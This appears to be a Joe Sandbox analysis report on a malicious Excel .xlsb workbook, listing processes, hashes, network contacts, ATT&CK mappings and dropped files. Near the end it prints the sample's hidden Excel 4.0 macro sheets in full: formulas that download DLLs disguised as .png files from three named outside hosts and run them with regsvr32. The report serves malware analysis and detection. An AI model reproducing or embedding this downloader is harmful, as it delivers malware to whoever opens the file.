Windows
Analysis Report
W-938893460.xlsb
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
EXCEL.EXE (PID: 1056 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) regsvr32.exe (PID: 1036 cmdline:
regsvr32 C :\Uduw\ehx w1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708) regsvr32.exe (PID: 1424 cmdline:
regsvr32 C :\Uduw\ehx w2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708) regsvr32.exe (PID: 1696 cmdline:
regsvr32 C :\Uduw\ehx w3.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": |
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | JA3 fingerprint: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Static file information: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Scripting | Path Interception | 1 Process Injection | 1 Regsvr32 | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 23 Exploitation for Client Execution | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 2 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 13 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Virtualization/Sandbox Evasion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Process Injection | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Scripting | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
natalespatagonia.cl | 192.185.17.132 | true | false | unknown | |
camarajocaclaudino.pb.gov.br | 162.241.62.76 | true | false | unknown | |
maramaabroo.com | 31.22.4.117 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
31.22.4.117 | maramaabroo.com | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false | |
192.185.17.132 | natalespatagonia.cl | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
162.241.62.76 | camarajocaclaudino.pb.gov.br | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 608746 |
Start date and time: 13/04/202216:07:25 | 2022-04-13 16:07:25 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | W-938893460.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSB@7/5@3/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, svchost.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- VT rate limit hit for: W-938893460.xlsb
Time | Type | Description |
---|---|---|
16:08:44 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
31.22.4.117 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
192.185.17.132 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
camarajocaclaudino.pb.gov.br | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
natalespatagonia.cl | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
maramaabroo.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
WILDCARD-ASWildcardUKLimitedGB | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B874A.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6144552 |
Entropy (8bit): | 2.9572715976810535 |
Encrypted: | false |
SSDEEP: | 6144:D6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1B6u5tA6lAx6k/X6xL/d4EXvTmOAMa5:DX/AMq15X/AMq1t |
MD5: | 523C247BCEF4FF8747015C252C8A9029 |
SHA1: | CF123936AEEDD0B1EE9FCD80A93F0D5DB671E10D |
SHA-256: | 3F0F6BB70F3D65DCC8D248D78AC320BCC22B1148EA5FDD2C1043065D03460133 |
SHA-512: | 7C91E2482EA91925D0773E7E23A02F7E1CDD2CF43E5EA6FDA9FA82697E34DF519F14146E383AF10BA1980B059FACEF28BE67C55CC32DD04DE9702EBC84BF4482 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2075AC3.jpg
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 214051 |
Entropy (8bit): | 7.738874694802587 |
Encrypted: | false |
SSDEEP: | 3072:Yaz6kqB/EsWcXCJGbtyntvHGiYMnIOwKSIYFUQRLmTDBwszHbcOQafZD/:A5nRXCw+DnIdFUKmTDBwsz7c1yD/ |
MD5: | 0F96E1C9A4BCCA8DB381A2316A435575 |
SHA1: | D480958CC7D25185BC7B762496701C1A47A15B22 |
SHA-256: | E2A3213A6690EFEDE67D20432F756BFC53FE6FCB1F14A4B1B64BC9A72E11BD94 |
SHA-512: | 19045F11C973BF947E18970E662982062B694AD43F0F6C62F756F39B3AB2A341505C209EBFE2A1AA5E682AA21A727DE95F407AB458CD2B39EEEACEB5E0D8D480 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.1464700112623651 |
Encrypted: | false |
SSDEEP: | 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X |
MD5: | 72F5C05B7EA8DD6059BF59F50B22DF33 |
SHA1: | D5AF52E129E15E3A34772806F6C5FBF132E7408E |
SHA-256: | 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164 |
SHA-512: | 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9273344 |
Entropy (8bit): | 2.958637995674597 |
Encrypted: | false |
SSDEEP: | 6144:u6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1U6u5tA6lAx6k/X6xL/d4EXvTmOAMat:uX/AMq1cX/AMq1cX/AMq1 |
MD5: | 79603B730C3DACD515209EDC2F631D38 |
SHA1: | 534674A86BD510BA26F9FCB6E9E4014F5107728D |
SHA-256: | 7A3B725A4D2DC6EFB09F8A67F74781B9738AED04DC919997544296B9CC404316 |
SHA-512: | 4E72574955290863ED1390FD2476AB9FA290CC5BE4797F22CB320313880BD402B326EB4BD887F6E3278CFE6547E68F093BE0DE14E992E1862E8D553CFD06EEA0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.951344840556028 |
TrID: |
|
File name: | W-938893460.xlsb |
File size: | 1057585 |
MD5: | 899517f64b531fa84462eb53bd071b50 |
SHA1: | 16fa83c16a17cc47bfd5424d60084bf70e2ce266 |
SHA256: | 1d7c459e0c8e7201933dec1ae217ba4f148838aca3ad10f9e2ba869d50e57e49 |
SHA512: | d9e63735b54948e82adabc9cb357d98cb058e6e0dbb940649785e9d288e6503472c7ce114b2eb19c77eda3bb205721c844c40ba9eec4ce828cfe560597a3313d |
SSDEEP: | 24576:O9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:C5KA65VSrX5KAV5KAVNFK |
TLSH: | 1A25F155A9690121D4FD313932008E409723384E90A4FDDE1E9B2EFF7B99978AC25BFC |
File Content Preview: | PK..........!.7.^*....^.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
Icon Hash: | e4e2ea8aa4b4b4b4 |
Document Type: | OpenXML |
Number of OLE Files: | 3 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3) |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN() |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52) |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3) |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
